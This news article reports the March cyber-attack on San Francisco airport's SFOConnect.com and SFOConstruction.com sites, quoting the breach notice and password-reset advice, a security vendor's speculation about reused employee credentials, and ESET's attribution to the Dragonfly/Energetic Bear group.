San Francisco International Airport (SFO) has just disclosed that some users of its websites may have had their logins stolen after a cyber-attack last month.
The airport revealed that its SFOConnect.com and SFOConstruction.com sites came under attack during March.
The first site appears to be a general-purpose information site for employees \ passengers whilst the other covers projects, bids and contracts related to the airport.
Attackers
“The attackers inserted malicious computer code on these websites to steal some users’ login credentials. Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO,” the breach notice explained.
“What information was involved? At this time, it appears the attackers may have accessed the impacted users’ usernames and passwords used to log on to those personal devices.”
Offline
The airport took the affected websites offline following the incident & ordered a reset of all SFO-related email & network passwords on March 23. The malicious code has also, it seems, been removed.
However, those who were possibly affected were strongly encouraged to act.
Password
“If you visited either website outside of SFO’s managed networks and using Internet Explorer on a Windows-based device, you should change the password you use to log in to that device,” the airport warned. “You should also consider changing any credentials that use the same username and password combination.”
Employees
Colin Bastable, CEO of cyber-training & awareness firm Lucy Security, suggested that SFO may have been compromised by employees who were using work credentials on sites that were subsequently breached.
“From a cursory glance in the darker corners of the web, I think the biggest risk to flysfo.com is from their employees using official email addresses for personal business on sites like Zynga and Myfitnesspal.com,” he commented.
Malicious
“I also found around 8,000 compromised credentials from late February featuring a couple of flysfo.com email addresses. Perhaps one of these opened the door, allowing the malicious code to be dropped in the SFO websites.”
The SFO Construction site is apparently currently undergoing maintenance, but the other site seems to be back up & running.
Message
Which all sends the strong message that even major players should not be complacent.
Update – April 15th – Russian Group responsible?
An Eset revelation in a social media post yesterday, claimed that the incident was “in line with the TTPs of an APT group known as Dragonfly/Energetic Bear.” This is, of course, a Russian group.
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” it explained.
Eset also quashed rumours that the attack had been actioned by Magecart digital skimming hackers.
“The targeted information was NOT the visitor’s credentials to the compromised websites, but rather the visitor’s own Windows credentials” it was explained.